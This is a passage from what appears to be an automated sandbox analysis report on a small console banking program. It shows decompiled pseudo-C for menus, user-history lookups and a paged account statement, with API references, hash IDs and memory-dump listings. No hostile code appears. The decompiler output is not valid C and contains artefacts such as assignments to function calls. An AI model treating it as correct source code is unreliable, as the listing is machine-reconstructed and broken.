									_t427 =  *0x23b288; // 0x0
									_t329 = fscanf(_t427, "%s %s %s\n", _t474 - 0x38, _t474 - 0x58, _t474 - 0x78);
									_t496 = _t495 + 0x14;
									if(_t329 == 0xffffffff) {
										break;
									}
									L5:
									_t334 = strcmp( *(_t474 - 8) * 0x45 +  *((intOrPtr*)(_t474 - 0x14)), _t474 - 0x38);
									_t495 = _t496 + 8;
									if(_t334 == 0) {
										_t33 = 4 +  *(_t474 - 8) * 0x45; // 0x52
										strcpy( *((intOrPtr*)(_t474 - 0x14)) + _t33, _t474 - 0x58);
										_t495 = _t495 + 8;
									}
								}
								L8:
								 *(_t474 - 8) = 1 +  *(_t474 - 8);
								_t382 =  *0x23b288; // 0x0
								fclose(_t382);
								_t477 = _t496 + 4;
							}
							L9:
							 *(_t474 - 0x30) =  *(_t474 - 8);
							_t244 =  *0x23b280; // 0x0
							fclose(_t244);
							E002323F0(_t343, _t502);
							E00231000(0x1e, 8);
							printf("1. View by USER NAME");
							E00231000(0x1e, 0xa);
							printf("2. View by DATE");
							E00231000(0x1e, 0xc);
							printf("3. View ALL User history");
							E00231000(0x1e, 0xe);
							printf("4. Return to main menu");
							_t483 = _t478 + 0x14;
							E00231000(1, 0xf);
							 *(_t474 - 8) = 0;
							while(1) {
								L11:
								if( *(_t474 - 8) >= 0x4e) {
									break;
								}
								L12:
								printf("_");
								_t483 = _t483 + 4;
								_t343 = 1 +  *(_t474 - 8);
								 *(_t474 - 8) = _t343;
							}
							L13:
							E00231000(0x17, 0x11);
							printf(" Press a number between the range [1 -4]  ");
							_t484 = _t483 + 4;
							 *(_t474 - 0xc) = 0;
							 *((char*)(_t474 - 2)) =  *(_t474 - 0xc);
							E002323F0(_t343, _t502);
							 *(_t474 - 0x20) =  *((char*)(_t474 - 2));
							_t345 =  *(_t474 - 0x20) - 1;
							 *(_t474 - 0x20) =  *(_t474 - 0x20) - 1;
							if( *(_t474 - 0x20) > 3) {
								L38:
								E002323F0(_t345, _t502);
								E00231000(0xa, 0xa);
								printf("Your input is out of range! Enter a choice between 1 to 4!");
								E00231000(0xf, 0xc);
								_t264 = printf("Press ENTER to return to main menu...");
								_t476 = _t484 + 8;
								 *(_t474 - 0x28) = 1;
								goto L39;
							} else {
								L14:
								switch( *((intOrPtr*)( *(_t474 - 0x20) * 4 +  &M00233C60))) {
									case 0:
										L15:
										E00231000(0x1e, 0xa);
										printf("Enter user name : ");
										_push(_t474 - 0x58);
										scanf(" %s");
										_t314 = _strupr(_t474 - 0x58);
										_t393 = _t474 - 0x58;
										_t264 = strcpy(_t474 - 0x58, _t314);
										_t476 = _t484 + 0x18;
										 *(_t474 - 8) = 0;
										while(1) {
											L17:
											__eflags =  *(_t474 - 8) -  *(_t474 - 0x30);
											if( *(_t474 - 8) >=  *(_t474 - 0x30)) {
												break;
											}
											L18:
											_t64 = 4 +  *(_t474 - 8) * 0x45; // 0x52
											_t316 = _strupr( *((intOrPtr*)(_t474 - 0x14)) + _t64);
											_t68 = 4 +  *(_t474 - 8) * 0x45; // 0x52
											strcpy( *((intOrPtr*)(_t474 - 0x14)) + _t68, _t316);
											_t320 =  *(_t474 - 8) * 0x45;
											_t377 =  *((intOrPtr*)(_t474 - 0x14));
											_t73 = _t320 + 4; // 0x52
											_t393 = _t377 + _t73;
											_t321 = strcmp(_t377 + _t73, _t474 - 0x58);
											_t476 = _t476 + 0x14;
											__eflags = _t321;
											if(_t321 == 0) {
												memcpy( *(_t474 - 0xc) * 0x45 +  *((intOrPtr*)(_t474 - 0x10)),  *(_t474 - 8) * 0x45 +  *((intOrPtr*)(_t474 - 0x14)), 0x11 << 2);
												_t476 = _t476 + 0xc;
												asm("movsb");
												_t325 = 1 +  *(_t474 - 0xc);
												__eflags = _t325;
												 *(_t474 - 0xc) = _t325;
											}
											_t264 = 1 +  *(_t474 - 8);
											__eflags = _t264;
											 *(_t474 - 8) = _t264;
										}
										L21:
										_t345 =  *(_t474 - 0xc);
										 *(_t474 - 0x18) =  *(_t474 - 0xc);
										goto L39;
									case 1:
										do {
											L22:
											E00231000(0x1e, 0xa) = printf("Enter Date (dd/mm/yyyy) : ");
											__edx = __ebp - 0x58;
											_push(__ebp - 0x58);
											scanf(" %s") = __ebp - 0x58;
											__eax = E00232170(__ebp - 0x58);
											__eflags = __eax;
											if(__eax == 0) {
												E00231260(0x1e, 0xa, 0x46, 0xa) = printf(0x239a14);
											}
											__ecx = __ebp - 0x58;
											__eax = E00232170(__ebp - 0x58);
											__eflags = __eax;
										} while (__eax == 0);
										__edx = __ebp - 0x58;
										__eax = E00231330(__ebp - 0x58);
										 *(__ebp - 8) = 0;
										 *(__ebp - 0xc) = 0;
										while(1) {
											L27:
											__ecx =  *(__ebp - 8);
											__eflags =  *(__ebp - 8) -  *((intOrPtr*)(__ebp - 0x30));
											if( *(__ebp - 8) >=  *((intOrPtr*)(__ebp - 0x30))) {
												break;
											}
											L28:
											__edx = __ebp - 0x58;
											__eax =  *(__ebp - 8);
											__eax =  *(__ebp - 8) * 0x45;
											__ecx =  *(__ebp - 0x14);
											_t97 = __eax + 0x22; // 0x70
											__edx = __ecx + _t97;
											__eax = strcmp(__ecx + _t97, __ebp - 0x58);
											__eflags = __eax;
											if(__eax == 0) {
												__ecx = 0x11;
												__eax = memcpy( *(__ebp - 0xc) * 0x45 +  *((intOrPtr*)(__ebp - 0x10)),  *(__ebp - 8) * 0x45 +  *(__ebp - 0x14), 0x11 << 2);
												__ecx = 0;
												asm("movsb");
												__eax =  *(__ebp - 0xc);
												__eax = 1 +  *(__ebp - 0xc);
												__eflags = __eax;
												 *(__ebp - 0xc) = __eax;
											}
											__eax =  *(__ebp - 8);
											__eax = 1 +  *(__ebp - 8);
											__eflags = __eax;
											 *(__ebp - 8) = __eax;
										}
										L31:
										__ecx =  *(__ebp - 0xc);
										 *(__ebp - 0x18) = __ecx;
										goto L39;
									case 2:
										L32:
										 *(__ebp - 8) = 0;
										while(1) {
											L34:
											__eax =  *(__ebp - 8);
											__eflags =  *(__ebp - 8) -  *((intOrPtr*)(__ebp - 0x30));
											if( *(__ebp - 8) >=  *((intOrPtr*)(__ebp - 0x30))) {
												break;
											}
											L35:
											__ecx = 0x11;
											__eax = memcpy( *(__ebp - 0xc) * 0x45 +  *((intOrPtr*)(__ebp - 0x10)),  *(__ebp - 8) * 0x45 +  *(__ebp - 0x14), 0x11 << 2);
											__ecx = 0;
											asm("movsb");
											__ecx =  *(__ebp - 0xc);
											__ecx = 1 +  *(__ebp - 0xc);
											 *(__ebp - 0xc) = __ecx;
											__edx =  *(__ebp - 8);
											__edx = 1 +  *(__ebp - 8);
											__eflags = __edx;
											 *(__ebp - 8) = __edx;
										}
										L36:
										__edx =  *(__ebp - 0xc);
										 *(__ebp - 0x18) =  *(__ebp - 0xc);
										L39:
										__eflags =  *(_t474 - 0x18);
										if( *(_t474 - 0x18) == 0) {
											E002323F0(_t345, _t502);
											E00231000(0x1b, 0xc);
											printf(0x239a7c);
											_t476 = _t476 + 4;
											_t264 = E00233460(_t393, __eflags, _t502);
										}
										__eflags =  *(_t474 - 0x28);
										if( *(_t474 - 0x28) != 0) {
											L85:
											 *(_t474 - 0x28) = 0;
										} else {
											L42:
											 *(_t474 - 8) = 0;
											 *(_t474 - 0xc) =  *(_t474 - 0x18) - 1;
											while(1) {
												L44:
												__eflags =  *(_t474 - 8) -  *(_t474 - 0x18);
												if( *(_t474 - 8) >=  *(_t474 - 0x18)) {
													break;
												}
												L45:
												memcpy( *(_t474 - 8) * 0x45 +  *((intOrPtr*)(_t474 - 0x24)),  *(_t474 - 0xc) * 0x45 +  *((intOrPtr*)(_t474 - 0x10)), 0x11 << 2);
												_t476 = _t476 + 0xc;
												asm("movsb");
												_t345 = 1 +  *(_t474 - 8);
												 *(_t474 - 8) = 1 +  *(_t474 - 8);
												_t419 =  *(_t474 - 0xc) - 1;
												__eflags = _t419;
												 *(_t474 - 0xc) = _t419;
											}
											L46:
											 *(_t474 - 8) = 0;
											while(1) {
												L48:
												__eflags =  *(_t474 - 8) -  *(_t474 - 0x18);
												if( *(_t474 - 8) >=  *(_t474 - 0x18)) {
													goto L50;
												}
												L49:
												memcpy( *(_t474 - 8) * 0x45 +  *((intOrPtr*)(_t474 - 0x10)),  *(_t474 - 8) * 0x45 +  *((intOrPtr*)(_t474 - 0x24)), 0x11 << 2);
												_t476 = _t476 + 0xc;
												asm("movsb");
												L47:
												_t345 = 1 +  *(_t474 - 8);
												__eflags = _t345;
												 *(_t474 - 8) = _t345;
											}
											goto L50;
										}
										goto L86;
									case 3:
										L37:
										goto L87;
								}
							}
							break;
						}
						L87:
						return _t264;
						L88:
					}
				}
			}

0x00233adf
0x00233adf
0x00233adf
0x00233ae5
0x00233aee
0x00233af1
0x00233af1
0x00233af7
0x00233af7
0x00233afd
0x00233b06
0x00233b11
0x00233b17
0x00233b31
0x00233b47
0x00233b55
0x00233b5a
0x00233b5f
0x00233b65
0x00233b6a
0x00233b70
0x00233b75
0x00233b75
0x00233b7a
0x00233b83
0x00233b91
0x00233b95
0x00233b9f
0x00233ba3
0x00233bad
0x00233bb1
0x00233bbb
0x00233bbf
0x00233bc5
0x00233bcb
0x00233bd7
0x00233be4
0x00000000
0x00233bd9
0x00233bd9
0x00233bdf
0x00233bdf
0x00233be9
0x00233be9
0x00233bf0
0x00233bfb
0x00233bfb
0x00233bf2
0x00233bf2
0x00233bf9
0x00000000
0x00000000
0x00233bf9
0x00233c02
0x00233c09
0x00233c0b
0x00233c11
0x00233c13
0x00233c13
0x00233c11
0x00233c1a
0x00233c21
0x002339c1
0x002339c1
0x002339ca
0x002339e9
0x002339f3
0x002339f9
0x002339cc
0x002339d0
0x002339da
0x002339e0
0x002339e0
0x002339fc
0x00233a00
0x00233a0a
0x00233a10
0x00233a17
0x00233a1c
0x00233a2e
0x00233a2e
0x00233a32
0x00000000
0x00000000
0x00233a34
0x00233a34
0x00233a3e
0x00233a44
0x00233a25
0x00233a28
0x00233a2b
0x00233a2b
0x00233a49
0x00233a4d
0x00233a4f
0x00233a55
0x00233a63
0x00233a63
0x00233a67
0x00000000
0x00000000
0x00233a69
0x00233a86
0x00233a86
0x00233a88
0x00233a5a
0x00233a5d
0x00233a60
0x00233a60
0x00233a8b
0x00233a8b
0x00233a9d
0x00233a9d
0x00233aa3
0x00000000
0x00000000
0x00233aa5
0x00233abc
0x00233abc
0x00233abe
0x00233a94
0x00233a97
0x00233a9a
0x00233a9a
0x00233a9d
0x00233ac1
0x00233ac7
0x00233ac9
0x00233ac9
0x00233ad0
0x00233ad3
0x00233ad6
0x00233af1
0x00233af7
0x00233af7
0x00000000
0x00233af7
0x00233c27
0x00233c27
0x00233c2e
0x00000000
0x00000000
0x00233c34
0x00233c34
0x00233c3b
0x00000000
0x00000000
0x00233c41
0x00233c4a
0x00233c4a
0x00233c51
0x00000000
0x00000000
0x002334cc
0x002334cc
0x002334d3
0x002334da
0x002334e1
0x002334f2
0x002334f8
0x002334fb
0x00233500
0x00233500
0x00233509
0x00233517
0x00233525
0x00233539
0x00233540
0x00233546
0x0023354c
0x00000000
0x00000000
0x00233552
0x0023355c
0x00233562
0x00233565
0x0023356a
0x0023356a
0x0023357b
0x00233582
0x00233588
0x0023358e
0x00000000
0x00000000
0x00233590
0x0023359e
0x002335a3
0x002335a8
0x002335b7
0x002335bc
0x002335c1
0x002335c1
0x002335c4
0x002335c6
0x002335cc
0x002335cf
0x002335d6
0x002335dc
0x002335dc
0x002335e4
0x002335e7
0x002335ea
0x002335f0
0x002335f9
0x00233602
0x0023360c
0x00233619
0x00233623
0x00233630
0x0023363a
0x00233647
0x00233651
0x00233657
0x0023365e
0x00233663
0x00233675
0x00233675
0x00233679
0x00000000
0x00000000
0x0023367b
0x00233680
0x00233686
0x0023366f
0x00233672
0x00233672
0x0023368b
0x0023368f
0x00233699
0x0023369f
0x002336a2
0x002336ac
0x002336af
0x002336b8
0x002336be
0x002336c1
0x002336c8
0x002338d8
0x002338d8
0x002338e1
0x002338eb
0x002338f8
0x00233902
0x00233908
0x0023390b
0x00000000
0x002336ce
0x002336ce
0x002336d1
0x00000000
0x002336d8
0x002336dc
0x002336e6
0x002336f2
0x002336f8
0x00233705
0x0023370f
0x00233713
0x00233718
0x0023371b
0x0023372d
0x0023372d
0x00233730
0x00233733
0x00000000
0x00000000
0x00233735
0x0023373e
0x00233743
0x00233756
0x0023375b
0x0023376a
0x0023376d
0x00233770
0x00233770
0x00233775
0x0023377a
0x0023377d
0x0023377f
0x00233798
0x00233798
0x0023379a
0x0023379e
0x0023379e
0x002337a1
0x002337a1
0x00233727
0x00233727
0x0023372a
0x0023372a
0x002337a9
0x002337a9
0x002337ac
0x00000000
0x00000000
0x002337b4
0x002337b4
0x002337c2
0x002337cb
0x002337ce
0x002337dd
0x002337e1
0x002337e6
0x002337e8
0x002337fc
0x00233802
0x00233805
0x00233809
0x0023380e
0x0023380e
0x00233812
0x00233816
0x0023381b
0x00233822
0x00233834
0x00233834
0x00233834
0x00233837
0x0023383a
0x00000000
0x00000000
0x0023383c
0x0023383c
0x00233840
0x00233843
0x00233846
0x00233849
0x00233849
0x0023384e
0x00233856
0x00233858
0x0023386c
0x00233871
0x00233871
0x00233873
0x00233874
0x00233877
0x00233877
0x0023387a
0x0023387a
0x0023382b
0x0023382e
0x0023382e
0x00233831
0x00233831
0x0023387f
0x0023387f
0x00233882
0x00000000
0x00000000
0x0023388a
0x0023388a
0x0023389c
0x0023389c
0x0023389c
0x0023389f
0x002338a2
0x00000000
0x00000000
0x002338a4
0x002338b6
0x002338bb
0x002338bb
0x002338bd
0x002338be
0x002338c1
0x002338c4
0x00233893
0x00233896
0x00233896
0x00233899
0x00233899
0x002338c9
0x002338c9
0x002338cc
0x00233912
0x00233912
0x00233916
0x00233918
0x00233921
0x0023392b
0x00233931
0x00233934
0x00233934
0x00233939
0x0023393d
0x00233c43
0x00233c43
0x00233943
0x00233943
0x00233943
0x00233950
0x00233967
0x00233967
0x0023396a
0x0023396d
0x00000000
0x00000000
0x0023396f
0x00233986
0x00233986
0x00233988
0x00233958
0x0023395b
0x00233961
0x00233961
0x00233964
0x00233964
0x0023398b
0x0023398b
0x0023399d
0x0023399d
0x002339a0
0x002339a3
0x00000000
0x00000000
0x002339a5
0x002339bc
0x002339bc
0x002339be
0x00233994
0x00233997
0x00233997
0x0023399a
0x0023399a
0x00000000
0x0023399d
0x00000000
0x00000000
0x002338d1
0x00000000
0x00000000
0x002336d1
0x00000000
0x002336c8
0x00233c57
0x00233c5c
0x00000000
0x00233c5c
0x00233af1

APIs

Part of subcall function 00231000: GetStdHandle.KERNEL32(000000F5,00000000,?,002310E3,?,?,?,00237B25), ref: 00231021
Part of subcall function 00231000: SetConsoleCursorPosition.KERNEL32(00000000,?,002310E3,?,?,?,00237B25), ref: 00231028

printf.MSVCRT ref: 00233B17
strlen.MSVCRT ref: 00233B5A
printf.MSVCRT ref: 00233BC5

Strings

%d., xrefs: 00233B12
%s%s%s%s, xrefs: 00233BC0

Memory Dump Source

Source File: 00000000.00000002.244120518.0000000000231000.00000020.00020000.sdmp, Offset: 00230000, based on PE: true

Associated: 00000000.00000002.244113353.0000000000230000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.244137823.0000000000238000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.244153970.0000000000239000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.244162037.000000000023C000.00000002.00020000.sdmp Download File

Similarity

API ID: printf$ConsoleCursorHandlePositionstrlen
String ID: %d.$%s%s%s%s
API String ID: 3542503040-4028964860
Opcode ID: 6b7080ef7773ad342dc6b0a65598082639e0e7461ae16222946e0e5f93a78ab7
Instruction ID: e4384a2c14e747c852d370005a9aeef8b85390d300e2e5b284ce11f74cb55594
Opcode Fuzzy Hash: 6b7080ef7773ad342dc6b0a65598082639e0e7461ae16222946e0e5f93a78ab7
Instruction Fuzzy Hash: C94171B1E1404AAFCB1CCF84D5E1ABEFB76EF91308F14809AD001AB245D7319B96CB40

Uniqueness

Uniqueness Score: -1.00%

Function 00237BC0, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 33
fileCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E00237BC0(char* _a4, signed int _a8) {
				signed int _v8;
				struct _IO_FILE* _v12;
				char _v212;
				struct _IO_FILE* _t15;
				int _t16;
				void* _t26;
				void* _t27;

				_v8 = 0;
				_t15 = fopen(_a4, "r");
				_t27 = _t26 + 8;
				_v12 = _t15;
				while(1) {
					_t16 = fscanf(_v12, "%s",  &_v212);
					_t27 = _t27 + 0xc;
					if(_t16 == 0xffffffff) {
						break;
					}
					_v8 = _v8 + 1;
				}
				fclose(_v12);
				asm("cdq");
				return _v8 / _a8;
			}

0x00237bc9
0x00237bd9
0x00237bdf
0x00237be2
0x00237be5
0x00237bf5
0x00237bfb
0x00237c01
0x00000000
0x00000000
0x00237c09
0x00237c09
0x00237c12
0x00237c1e
0x00237c25

APIs

fopen.MSVCRT ref: 00237BD9
fscanf.MSVCRT ref: 00237BF5
fclose.MSVCRT ref: 00237C12

Strings

:u@su, xrefs: 00237BD9

Memory Dump Source

Source File: 00000000.00000002.244120518.0000000000231000.00000020.00020000.sdmp, Offset: 00230000, based on PE: true

Associated: 00000000.00000002.244113353.0000000000230000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.244137823.0000000000238000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.244153970.0000000000239000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.244162037.000000000023C000.00000002.00020000.sdmp Download File

Similarity

API ID: fclosefopenfscanf
String ID: :u@su
API String ID: 329293974-180466521
Opcode ID: aa7923151158ca4bdab891e6572c95eed5bf1b586da2c7df708f5aff7382de0e
Instruction ID: 70dfa7cc42d68235889242d1fb8f5abf03d7bd06bfe214774aaa9fb92216b316
Opcode Fuzzy Hash: aa7923151158ca4bdab891e6572c95eed5bf1b586da2c7df708f5aff7382de0e
Instruction Fuzzy Hash: 88F096F5910208EBCB14DFA8EC49A9DBB74EF00304F144255F9099B250DA31AB68DB91

Uniqueness

Uniqueness Score: -1.00%

Function 002373AA, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43
stringCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E002373AA() {
				int _t167;
				int _t174;
				int _t193;
				void* _t346;
				void* _t348;
				void* _t354;
				void* _t355;
				void* _t365;
				void* _t366;
				void* _t368;
				long long _t375;

				L0:
				while(1) {
					L0:
					 *(_t346 - 0x10) =  *(_t346 - 0x10) + 1;
					L16:
					while(1) {
						L16:
						if( *(_t346 - 0x10) < 0xa) {
							L17:
							E00231000(2,  *(_t346 - 0x10) + 8);
							_push( *(_t346 - 4) + 1);
							printf("%d.");
							_t365 = _t348 + 8;
							 *(_t346 - 0x14) = 0;
							while(1) {
								L19:
								_t48 = 8 +  *(_t346 - 4) * 0x5c; // 0x8
								_t193 = strlen( *((intOrPtr*)(_t346 - 8)) + _t48);
								_t365 = _t365 + 4;
								if( *(_t346 - 0x14) >= _t193) {
									break;
								}
								L20:
								if( *((char*)( *(_t346 - 4) * 0x5c +  *((intOrPtr*)(_t346 - 8)) +  *(_t346 - 0x14) + 8)) == 0x2b) {
									 *((char*)( *(_t346 - 4) * 0x5c +  *((intOrPtr*)(_t346 - 8)) +  *(_t346 - 0x14) + 8)) = 0x20;
								}
								 *(_t346 - 0x14) =  *(_t346 - 0x14) + 1;
							}
							L23:
							E00231000(6,  *(_t346 - 0x10) + 8);
							_t64 = 8 +  *(_t346 - 4) * 0x5c; // 0x8
							puts( *((intOrPtr*)(_t346 - 8)) + _t64);
							_t366 = _t365 + 4;
							if( *((intOrPtr*)(_t346 - 0x20)) == 0) {
								_t69 = 0x21 +  *(_t346 - 4) * 0x5c; // 0x21
								E00231410(_t375,  *((intOrPtr*)(_t346 - 8)) + _t69);
							}
							E00231000(0x1c,  *(_t346 - 0x10) + 8);
							_t74 = 0x21 +  *(_t346 - 4) * 0x5c; // 0x21
							puts( *((intOrPtr*)(_t346 - 8)) + _t74);
							 *((char*)( *(_t346 - 4) * 0x5c +  *((intOrPtr*)(_t346 - 8)) + 0x35)) = 0;
							E00231000(0x2c,  *(_t346 - 0x10) + 8);
							_t83 = 0x30 +  *(_t346 - 4) * 0x5c; // 0x30
							_push( *((intOrPtr*)(_t346 - 8)) + _t83);
							printf("%s");
							_t368 = _t366 + 0xc;
							if( *((char*)( *(_t346 - 4) * 0x5c +  *((intOrPtr*)(_t346 - 8)) + 8)) != 0x54) {
								if( *((char*)( *(_t346 - 4) * 0x5c +  *((intOrPtr*)(_t346 - 8)) + 8)) != 0x43 ||  *((char*)( *(_t346 - 4) * 0x5c +  *((intOrPtr*)(_t346 - 8)) + 0xd)) != 0x57 &&  *((char*)( *(_t346 - 4) * 0x5c +  *((intOrPtr*)(_t346 - 8)) + 0xbadbb5)) != 0x6c) {
									E00231000(0x32,  *(_t346 - 0x10) + 8);
									asm("cvtss2sd xmm0, [edx+ecx+0x58]");
									asm("movsd [esp], xmm0");
									printf("%13.2f");
									_t348 = _t368 - 8 + 0xc;
									asm("movss xmm0, [ebp-0x2c]");
									asm("addss xmm0, [ecx+eax+0x58]");
									asm("movss [ebp-0x2c], xmm0");
								} else {
									E00231000(0x41,  *(_t346 - 0x10) + 8);
									asm("cvtss2sd xmm0, [eax+edx+0x58]");
									asm("movsd [esp], xmm0");
									printf("%13.2f");
									_t348 = _t368 - 8 + 0xc;
									asm("movss xmm0, [ebp-0x18]");
									asm("addss xmm0, [edx+ecx+0x58]");
									asm("movss [ebp-0x18], xmm0");
								}
							} else {
								E00231000(0x41,  *(_t346 - 0x10) + 8);
								asm("cvtss2sd xmm0, [ecx+eax+0x58]");
								asm("movsd [esp], xmm0");
								printf("%13.2f");
								_t348 = _t368 - 8 + 0xc;
								asm("movss xmm0, [ebp-0x18]");
								asm("addss xmm0, [eax+edx+0x58]");
								asm("movss [ebp-0x18], xmm0");
							}
							 *(_t346 - 4) =  *(_t346 - 4) + 1;
							_t174 =  *(_t346 - 4);
							if(_t174 <  *(_t346 - 0xc)) {
								L34:
								goto L0;
							}
						}
						L35:
						 *(_t346 - 0x24) =  *(_t346 - 0x24) + 0xa;
						if( *(_t346 - 4) >=  *(_t346 - 0xc)) {
							L36:
							E00231000(1,  *(_t346 - 0x10) + 9);
							 *(_t346 - 0x14) = 1;
							L38:
							while( *(_t346 - 0x14) < 0x4f) {
								_push(0xc4);
								printf("%c");
								_t348 = _t348 + 8;
								L37:
								 *(_t346 - 0x14) =  *(_t346 - 0x14) + 1;
							}
							E00231000(0x28,  *(_t346 - 0x10) + 0xa);
							printf("TOTAL");
							E00231000(0x32,  *(_t346 - 0x10) + 0xa);
							asm("cvtss2sd xmm0, [ebp-0x2c]");
							asm("movsd [esp], xmm0");
							printf("%13.2f");
							E00231000(0x41,  *(_t346 - 0x10) + 0xa);
							asm("cvtss2sd xmm0, [ebp-0x18]");
							asm("movsd [esp], xmm0");
							printf("%13.2f");
							_t348 = _t348 + 4 - 8 + 0xc - 8 + 0xc;
							asm("movss xmm0, [0x238110]");
							asm("movss [ebp-0x18], xmm0");
							asm("movss xmm0, [ebp-0x18]");
							asm("movss [ebp-0x2c], xmm0");
							_t174 = E00231000(1,  *(_t346 - 0x10) + 0xb);
							 *(_t346 - 0x14) = 1;
							L42:
							while( *(_t346 - 0x14) < 0x4f) {
								_push(0xc4);
								printf("%c");
								_t348 = _t348 + 8;
								L41:
								_t174 =  *(_t346 - 0x14) + 1;
								 *(_t346 - 0x14) = _t174;
							}
							 *((intOrPtr*)(_t346 - 0x20)) =  *((intOrPtr*)(_t346 - 0x20)) + 1;
						}
						L45:
						if( *((char*)(_t346 - 0x19)) == 0x20) {
							_t174 =  *(_t346 - 0x28) + 1;
							 *(_t346 - 0x28) = _t174;
						}
						L47:
						_t240 =  *((char*)(_t346 - 0x19));
						if( *((char*)(_t346 - 0x19)) == 0x20) {
							L1:
							E002323F0(_t240, _t375);
							E00231000(2, 6);
							puts("SN");
							E00231000(6, 6);
							puts("     Details");
							E00231000(0x1c, 6);
							puts("Date");
							E00231000(0x2c, 6);
							puts("Time");
							E00231000(0x32, 6);
							puts("   Dr. (NRs.)");
							E00231000(0x41, 6);
							puts("   Cr. (NRs.)");
							_t354 = _t348 + 0x18;
							E00231000(1, 7);
							 *(_t346 - 4) = 1;
							L3:
							while( *(_t346 - 4) < 0x4f) {
								_push(0xc4);
								printf("%c");
								_t354 = _t354 + 8;
								 *(_t346 - 4) =  *(_t346 - 4) + 1;
							}
							E00231000(1, 0x15);
							 *(_t346 - 4) = 1;
							L7:
							while( *(_t346 - 4) < 0x4f) {
								_push(0xc4);
								printf("%c");
								_t354 = _t354 + 8;
								 *(_t346 - 4) =  *(_t346 - 4) + 1;
							}
							if( *(_t346 - 0x24) >  *(_t346 - 0xc)) {
								 *(_t346 - 0x24) = 0;
								 *(_t346 - 0x28) = 1;
							}
							 *(_t346 - 4) =  *(_t346 - 0x24);
							E00231000(2, 0x16);
							asm("cdq");
							_push( *(_t346 - 0xc) / 0xa + 1);
							_push( *(_t346 - 0x28));
							printf("Page : %d out of %d");
							_t355 = _t354 + 0xc;
							if( *(_t346 - 0xc) > 9) {
								asm("cdq");
								if( *(_t346 - 0x28) ==  *(_t346 - 0xc) / 0xa + 1) {
									E00231000(0x19, 0x16);
									printf("Press SPACE BAR to view first page");
									_t355 = _t355 + 4;
								} else {
									E00231000(0x19, 0x16);
									printf("Press SPACE BAR to view next page");
									_t355 = _t355 + 4;
								}
							}
							E00231000(2, 0x14);
							_push(_t346 - 0x21a);
							_t167 = printf("A/C holder : %s %s");
							asm("movss xmm0, [ebp-0x190]");
							asm("movss [esp], xmm0");
							E00231730(_t167, _t346 - 0xd8, _t346 - 0x238);
							strcpy(_t346 - 0xbc, "Bank Balance : ");
							strcat(_t346 - 0xbc, _t346 - 0xd8);
							E00231000(0x4e - strlen(_t346 - 0xbc), 0x14);
							_push(_t346 - 0xbc);
							_t174 = printf("%s");
							_t348 = _t355 + 0x24;
							 *(_t346 - 0x10) = 0;
							continue;
						}
						L48:
						return _t174;
						L49:
					}
				}
			}

0x002373aa
0x002373aa
0x002373aa
0x002373b0
0x00000000
0x002373b3
0x002373b3
0x002373b7
0x002373bd
0x002373c6
0x002373d1
0x002373d7
0x002373dd
0x002373e0
0x002373f2
0x002373f2
0x002373fb
0x00237400
0x00237405
0x0023740b
0x00000000
0x00000000
0x0023740d
0x00237421
0x0023742f
0x0023742f
0x002373ef
0x002373ef
0x00237436
0x0023743f
0x0023744d
0x00237452
0x00237458
0x0023745f
0x0023746a
0x0023746f
0x0023746f
0x0023747d
0x0023748b
0x00237490
0x002374aa
0x002374b8
0x002374c6
0x002374ca
0x002374d0
0x002374d6
0x002374f2
0x0023755e
0x002375f1
0x002375ff
0x00237608
0x00237612
0x00237618
0x00237624
0x00237629
0x0023762f
0x0023759a
0x002375a3
0x002375b1
0x002375ba
0x002375c4
0x002375ca
0x002375d6
0x002375db
0x002375e1
0x002375e1
0x002374f4
0x002374fd
0x0023750b
0x00237514
0x0023751e
0x00237524
0x00237530
0x00237535
0x0023753b
0x0023753b
0x0023763a
0x0023763d
0x00237643
0x00237647
0x00000000
0x00237647
0x00237643
0x0023764c
0x00237652
0x0023765b
0x00237661
0x0023766a
0x0023766f
0x00000000
0x00237681
0x00237687
0x00237691
0x00237697
0x00237678
0x0023767e
0x0023767e
0x002376a5
0x002376af
0x002376c1
0x002376c6
0x002376ce
0x002376d8
0x002376ea
0x002376ef
0x002376f7
0x00237701
0x00237707
0x0023770a
0x00237712
0x00237717
0x0023771c
0x0023772a
0x0023772f
0x00000000
0x00237741
0x00237747
0x00237751
0x00237757
0x00237738
0x0023773b
0x0023773e
0x0023773e
0x00237762
0x00237762
0x00237765
0x0023776c
0x00237771
0x00237774
0x00237774
0x00237777
0x00237777
0x0023777e
0x0023717c
0x0023717c
0x00237185
0x0023718f
0x0023719c
0x002371a6
0x002371b3
0x002371bd
0x002371ca
0x002371d4
0x002371e1
0x002371eb
0x002371f8
0x00237202
0x00237208
0x0023720f
0x00237214
0x00000000
0x00237226
0x0023722c
0x00237236
0x0023723c
0x00237223
0x00237223
0x00237245
0x0023724a
0x00000000
0x0023725c
0x00237262
0x0023726c
0x00237272
0x00237259
0x00237259
0x0023727d
0x0023727f
0x00237286
0x00237286
0x00237290
0x00237297
0x0023729f
0x002372aa
0x002372ae
0x002372b4
0x002372ba
0x002372c1
0x002372c6
0x002372d4
0x002372f3
0x002372fd
0x00237303
0x002372d6
0x002372da
0x002372e4
0x002372ea
0x002372ea
0x002372d4
0x0023730a
0x00237315
0x00237322
0x0023732b
0x00237333
0x0023733f
0x00237350
0x00237366
0x00237387
0x00237392
0x00237398
0x0023739e
0x002373a1
0x00000000
0x002373a1
0x00237784
0x00237789
0x00000000
0x00237789
0x002373b3

APIs

printf.MSVCRT ref: 002373D7
strlen.MSVCRT ref: 00237400
puts.MSVCRT ref: 00237452
puts.MSVCRT ref: 00237490
printf.MSVCRT ref: 002374D0
printf.MSVCRT ref: 0023751E
printf.MSVCRT ref: 002375C4
printf.MSVCRT ref: 00237691
printf.MSVCRT ref: 002376AF
printf.MSVCRT ref: 002376D8
printf.MSVCRT ref: 00237701
printf.MSVCRT ref: 00237751

Part of subcall function 00231000: GetStdHandle.KERNEL32(000000F5,00000000,?,002310E3,?,?,?,00237B25), ref: 00231021
Part of subcall function 00231000: SetConsoleCursorPosition.KERNEL32(00000000,?,002310E3,?,?,?,00237B25), ref: 00231028

Strings

%d., xrefs: 002373D2

Memory Dump Source

